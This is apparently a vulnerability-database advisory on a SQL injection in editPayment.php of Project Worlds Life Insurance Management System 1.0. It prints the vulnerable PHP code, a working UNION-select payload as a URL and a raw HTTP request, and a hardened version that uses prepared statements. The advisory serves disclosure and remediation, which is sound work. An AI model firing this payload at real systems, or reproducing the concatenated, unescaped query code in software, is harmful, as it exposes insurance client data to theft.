| Title | Project Worlds Life Insurance Management System v1.0 SQL Injection |
|---|
| Description | # SQL Injection vulnerability was discovered in Life Insurance Management System (editPayment.php)
Official Website: https://projectworlds.in/life-insurance-management-system-in-php/
Version: 1.0
Related Code file: /lims/editPayment.php
dbname=lims
Payload: /lims/editPayment.php?recipt_no=-1511988103_361528786%27%20union%20select%201,database(),3,4,5,6,7--+
<hr>
```php
<?php
include 'connection.php';
$id = "";
if ($_SERVER["REQUEST_METHOD"] == "GET") {
    // Attacker-controlled value taken straight from the query string
    $recipt_no = $_GET["recipt_no"];
}
// Vulnerable: $recipt_no is concatenated into the SQL text inside single quotes
$sql = "SELECT recipt_no, client_id, month, amount, due, fine, agent_id from payment where recipt_no='$recipt_no'";
$result = $conn->query($sql);
echo "<div>\n";
echo '<form action="updatePayment.php" method="post">';
// Each of the seven selected columns is echoed back into the form
while ($row = $result->fetch_assoc()) {
    echo "<label for=\"fname\">RECIPT NO</label>";
    echo "<input type=\"text\" recipt_no=\"fname\" name=\"recipt_no\" placeholder=\"Your recpit no..\" value=\"$row[recipt_no]\">";
    echo "<label for=\"fname\">CLIENT ID</label>";
    echo "<input type=\"text\" recipt_no=\"fname\" name=\"client_id\" placeholder=\"Client Id..\" value=\"$row[client_id]\">";
    echo "<label for=\"fname\">MONTH</label>";
    echo "<input type=\"text\" recipt_no=\"fname\" name=\"month\" placeholder=\"Month..\" value=\"$row[month]\">";
    echo "<label for=\"fname\">AMOUNT</label>";
    echo "<input type=\"text\" recipt_no=\"fname\" name=\"amount\" placeholder=\"Amount..\" value=\"$row[amount]\">";
    echo "<label for=\"fname\">DUE</label>";
    echo "<input type=\"text\" recipt_no=\"fname\" name=\"due\" placeholder=\"Your Due..\" value=\"$row[due]\">";
    echo "<label for=\"fname\">FINE</label>";
    echo "<input type=\"text\" recipt_no=\"fname\" name=\"fine\" placeholder=\"Fine..\" value=\"$row[fine]\">";
    echo "<label for=\"fname\">AGENT ID</label>";
    echo "<input type=\"text\" recipt_no=\"fname\" name=\"agent_id\" placeholder=\"Agent Id..\" value=\"$row[agent_id]\">";
}
echo "<input type=\"submit\" value=\"UPDATE\">";
echo "</form>\n";
echo "<a href='deletePayment.php?recipt_no=".$recipt_no."'>Delete Payment</a>";
echo "</div>\n";
echo "\n";
?>
```
The id variable is directly inserted into the SQL query without any escaping or parameterization. An attacker could inject malicious SQL code by manipulating the id field. in (line number 88-135 of )
Injection parameter: recipt_no
```
GET /lims/editPayment.php?recipt_no=-1511988103_361528786%27%20union%20select%201,database(),3,4,5,6,7--+ HTTP/1.1
Host: 192.168.1.18
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=m36in4a8ui1q6k23afkenkqivk
Connection: close
```
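
A hardened form of the lookup in editPayment.php, as an added example that is not code from the original report or from Project Worlds: `recipt_no` is bound as a statement parameter instead of being concatenated, and every value is escaped before it is printed. It assumes `connection.php` provides `$conn` as a `mysqli` object (as the `$conn->query()` and `fetch_assoc()` calls above suggest); the 64-character limit and the `h()` helper are hypothetical.

```php
<?php
// Added example, not the project's code.
// Assumption: connection.php defines $conn as a mysqli object.
include 'connection.php';

// Reject a missing, array-valued or oversized parameter before touching the DB.
// The 64-character cap is a hypothetical limit; adjust to the real receipt format.
$recipt_no = $_GET['recipt_no'] ?? null;
if (!is_string($recipt_no) || $recipt_no === '' || strlen($recipt_no) > 64) {
    http_response_code(400);
    exit('Invalid receipt number');
}

// The value travels as a bound parameter, so a quote or UNION keyword inside it
// is compared as data against recipt_no and is never parsed as SQL.
$stmt = $conn->prepare(
    'SELECT recipt_no, client_id, month, amount, due, fine, agent_id
       FROM payment WHERE recipt_no = ?'
);
if ($stmt === false) {
    http_response_code(500);
    exit('Query error');
}
$stmt->bind_param('s', $recipt_no);
$stmt->execute();
$result = $stmt->get_result(); // needs the mysqlnd driver

// Hypothetical helper: escape a value for use in HTML text or attributes.
function h($v): string {
    return htmlspecialchars((string) $v, ENT_QUOTES, 'UTF-8');
}

$fields = ['recipt_no', 'client_id', 'month', 'amount', 'due', 'fine', 'agent_id'];
echo '<form action="updatePayment.php" method="post">';
while ($row = $result->fetch_assoc()) {
    foreach ($fields as $name) {
        echo '<label>' . h(strtoupper(str_replace('_', ' ', $name))) . '</label>';
        echo '<input type="text" name="' . h($name) . '" value="' . h($row[$name]) . '">';
    }
}
echo '<input type="submit" value="UPDATE">';
echo '</form>';
// URL-encode, then HTML-escape, the value placed in the delete link.
echo '<a href="deletePayment.php?recipt_no=' . h(urlencode($recipt_no)) . '">Delete Payment</a>';
$stmt->close();
```

With the request shown above, the bound query looks for a receipt whose number equals the whole submitted string, finds none, and renders an empty form.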

|
|---|
| Source | https://github.com/peteryang520/Cve-report/blob/main/SQLi-1.md |
|---|
| User | Hantao Yang (UID 76989) |
|---|
| Submission | 01/11/2024 10:13 (1 year ago) |
|---|
| Moderation | 02/11/2024 19:09 (1 day later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 282903 [Project Worlds Life Insurance Management System 1.0 /editPayment.php recipt_no SQL Injection] |
|---|
| Points | 20 |
|---|